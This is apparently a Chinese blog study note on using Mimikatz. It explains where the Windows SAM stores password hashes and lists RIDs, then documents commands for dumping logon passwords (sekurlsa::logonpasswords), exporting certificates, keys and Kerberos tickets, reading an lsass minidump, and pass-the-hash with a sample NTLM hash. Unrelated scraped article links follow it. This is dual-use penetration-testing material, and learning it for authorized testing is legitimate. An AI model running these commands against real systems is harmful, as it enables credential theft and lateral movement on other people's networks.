Mimikatz 使用学习
下载地址
https://github.com/gentilkiwi/mimikatz/
windows:https://download.csdn.net/download/think_ycx/9362975
官方使用教程
http://www.91ri.org/15178.html
windows密码文件的解读
加密方式链接:
https://blog.csdn.net/ytfhjhv/article/details/83513671
存储位置:C:\windows\system32\config\SAM
密码文件存储格式:
Windows系统下的hash密码格式为:用户名称:RID:LM-HASH值:NT-HASH值
SID和RID的解读:
链接:https://www.secpulse.com/archives/72017.html
SID:安全标示符,是Windows系统用于唯一标识用户或组的可变长度结构
RID:Windows系统账户对应固定的RID
500: ADMINISTRATOR
501: GUEST
502: krbtgt(域环境)
512: Domain Admins(域环境)
513: Domain Users(域环境)
514: Domain Guests(域环境)
515: Domain Computers(域环境)
516: Domain Controllers(域环境)
命令
standard
退出
exit
清屏
cls
将所所有输出记录到文件中
log other.log
log /stop (停止文件记录)
从磁盘上的文件写入切换到Base64输出
base64
kerbreros::list /export
进入目录
cd xxx
privilege
privilege::debug
备注: ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061表示所需的特权不是由客户端拥有的(通常您不是管理员)
crypto
提供的程序
crypto::providers
此命令列出系统存储中的逻辑存储
参数:
/systemstore- 可选 -必须使用列表存储系统存储(默认CERT_SYSTEM_STORE_CURRENT_USER),
它可以是一个:
CERT_SYSTEM_STORE_CURRENT_USER 要么 CURRENT_USER
CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY 要么 USER_GROUP_POLICY
CERT_SYSTEM_STORE_LOCAL_MACHINE 要么 LOCAL_MACHINE
CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY 要么 LOCAL_MACHINE_GROUP_POLICY
CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE 要么 LOCAL_MACHINE_ENTERPRISE
CERT_SYSTEM_STORE_CURRENT_SERVICE 要么 CURRENT_SERVICE
CERT_SYSTEM_STORE_USERS 要么 USERS
CERT_SYSTEM_STORE_SERVICES 要么 SERVICES
crypto::stores /systemstore:local_machine
此命令列出系统上或驱逐到系统上的智能卡/令牌读取器。
crypto::sc
此命令创建由证书颁发机构签名的用于智能卡身份验证的客户端证书
参数:
/caname -证书颁发机构的主题名称(需要签署证书)
/castore- 可选 -包含证书颁发机构的系统存储(默认:CERT_SYSTEM_STORE_LOCAL_MACHINE)
/upn-用户主要名称(UPN)为对象(如:user@lab.local)
/pfx- 可选 -用于保存最终证书的文件名(默认值:无文件,存储在中CERT_SYSTEM_STORE_CURRENT_USER)
crypto::scauth /caname:KiwiAC /upn:user@lab.local /pfx:user.pfx
此命令列出证书及其密钥的属性,它也可以到处证书
参数:
/systemstore- 可选 -必须使用系统存储(默认:CERT_SYSTEM_STORE_CURRENT_USER)
/store- 可选 -必须用于列出/导出证书的存储(默认值:My)-具有以下内容的完整列表crypto::stores
/export- 可选 -导出所有的证书文件(在公共部位DER,在私处PFX的文件-有密码保护:mimikatz)
/silent- 可选 -如果需要用户交互,则中止
/nokey- 可选 -请勿尝试与私钥进行交互
certificates /systemstore:local_machine /store:my /export
备注:
请参阅crypto::stores以获取有效systemstore列表,其输出用于store列表。
不可导出的键(带有KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFile (0x8009000b))通常可以通过crypto::capi和/或导出crypto::cng
尽管crypto::capi或crypto::cng补丁,你必须在正确的文件系统ACL访问私有密钥
一些智能卡加密提供商可以报告成功的私人出口
键
此命令按提供程序列出密钥。它也可以导出密钥。
参数:
/provider- 可选 -传统CryptoAPI提供商(默认:MS_ENHANCED_PROV)
/providertype- 可选 -传统CryptoAPI提供者类型(默认值:PROV_RSA_FULL)
/cngprovider- 可选 -的CNG提供商(默认:Microsoft Software Key Storage Provider)
/export- 可选 -将所有密钥导出到PVK文件
/silent- 可选 -如果需要用户交互,则中止
crypto::keys /export
sekurlsa
登录密码
sekurlsa::logonpasswords
pth
参数:
/user -您要模拟的用户名,请记住,管理员不是此知名帐户的唯一名称。
/domain-完全限定的域名-没有域,或者在本地用户/管理员的情况下,请使用计算机或服务器名称,workgroup或其他名称。
/rc4或/ntlm- 可选 -用户密码的RC4密钥/ NTLM哈希。
/aes128- 可选 -从用户密码和域领域派生的AES128密钥。
/aes256- 可选 -从用户密码和域域派生的AES256密钥。
/run- 可选 -要运行的命令行-默认为:cmd具有外壳。
sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a
备注:
此命令不适用于小型转储(废话);
它需要提升的特权(privilege::debug或SYSTEM帐户),与使用一种官方API的“通行票”不同;
这个新版本的“通过-散列”将RC4 keysKerberos 替换为ntlm散列(和/或替换AES密钥)-它允许Kerberos提供程序询问TGT票证!;
ntlm在XP / 2003 / Vista / 2008和7 / 2008r2 / 8/2012之前,哈希是必需的kb2871997(AES不可用或不可替换);
AES密钥只能在8.1 / 2012r2或7 / 2008r2 / 8/2012上替换为kb2871997,在这种情况下,您可以避免使用ntlm哈希。
tickets
sekurlsa::tickets /export
ekeys
sekurlsa::ekeys
dpapi
sekurlsa::dpapi
minidump
sekurlsa::minidump lsass.dmp
kerberos
sekurlsa::kerberos
lsadump
vault
token
event
ts
process
service
net
misc
library mimilib
driver mimidrv
以上命令官方教程都有,这就不在摘抄了。。。
Mimikatz 使用学习的更多相关文章
- [转帖]mimikatz 学习
mimikatz mimikatz 2.0 vient de sortir en version alpha binaires : https://github.com/gentilkiwi/mimi ...
- 如何防御mimikatz致敬Mimikatz攻防杂谈学习笔记
零.绪论:mimikatz简介 mimikatz是一款出色的内网渗透工具,可以抓取windows主机的明文密码.NTLMhash值或者kerberos对应的缓存凭据.mimikatz的使用在获取权限后 ...
- 23.通过MS17_010来学习msf对渗透的利用
Metersploit 集成了渗透阶段的全部利用,从漏洞探测,到漏洞利用,最后到后渗透阶段.本次博客主要抛砖引玉,通过对MS17_010漏洞的复现,来学习Metasploit. 漏洞环境: 靶机:wi ...
- [转帖][思路/技术]Mimikatz的多种攻击方式以及防御方式
[思路/技术]Mimikatz的多种攻击方式以及防御方式 https://bbs.ichunqiu.com/thread-53954-1-1.html 之前学习过 抄密码 没想到还有这么多功能. ...
- Cobalt Strike学习笔记
Cobalt Strike 一款以metasploit为基础的GUI的框架式渗透测试工具,集成了端口转发.服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java ...
- msf学习笔记
metasploit frame 这是一个渗透测试框架,围绕这个框架,我们就可以完成最终的目标,即渗透测试. 渗透测试者困扰:需要掌握数百个工具,上千条命令参数,很难记住. 新出现的漏洞PoC/EXP ...
- 黑盒渗透测试【转自HACK学习-FoxRoot】
因 搜到一篇写渗透测试步骤比较详细的文章,转过来学习,方便时常看看. 内容如下: 一.信息搜集 主动/被动搜集 信息搜集分为主动信息搜集和被动信息搜集. 主动信息搜集就是通过直接访问和扫描信息的方式进 ...
- 从直播编程到直播教育:LiveEdu.tv开启多元化的在线学习直播时代
2015年9月,一个叫Livecoding.tv的网站在互联网上引起了编程界的注意.缘于Pingwest品玩的一位编辑在上网时无意中发现了这个网站,并写了一篇文章<一个比直播睡觉更奇怪的网站:直 ...
- Angular2学习笔记(1)
Angular2学习笔记(1) 1. 写在前面 之前基于Electron写过一个Markdown编辑器.就其功能而言,主要功能已经实现,一些小的不影响使用的功能由于时间关系还没有完成:但就代码而言,之 ...
随机推荐
- ES6判断当前页面是否微信浏览器中打开
1.使用jq判断是否用微信浏览器打开页面 var is_weixin = (function(){return navigator.userAgent.toLowerCase().indexOf('m ...
- Vue组件定义
简介 组件是可复用的 Vue 实例. 本质上是一个对象,该对象包含data.computed.watch.methods.filters以及生命周期钩子等成员属性. 组件结构: { data(){ r ...
- 两种方法删除ArrayList里反复元素
方法一: /** List order not maintained **/ public static void removeDuplicate(ArrayList arlList) { HashS ...
- Form表单组件验证
第一版:最基本版本 views源码 #——————————————————————form验证—————————————— from django import forms from django.f ...
- Viewer.js – 强大的JS/jQuery图片查看器
简介 Viewer.js 是一款强大的图片查看器,像门户网站一般都会有各自的图片查看器,如果您正需要一款强大的图片查看器,也许 Viewer.js 是一个很好的选择.Viewer.js 有以下特点: ...
- call apply bind的使用方法和区别
call 1.改变this指向 2.执行函数 3.传参 var obj={}; function fun(a,b){ console.log(a,b,this); } fun(1,2); / ...
- 获取Http请求IP的工具类
public class IpAddressUtil { public static String getIpAddr(HttpServletRequest request){ String ipAd ...
- [NOI2004]郁闷的出纳员(平衡树)
[NOI2004]郁闷的出纳员 题目链接 题目描述 OIER公司是一家大型专业化软件公司,有着数以万计的员工.作为一名出纳员,我的任务之一便是统计每位员工的工资.这本来是一份不错的工作,但是令人郁闷的 ...
- rabbit例子
https://blog.csdn.net/csm201314/article/details/76377214 #include <SimpleAmqpClient/SimpleAmqpCli ...
- alert(1) to win 4
function escape(s) { var url = 'javascript:console.log(' + JSON.stringify(s) + ')'; console.log(url) ...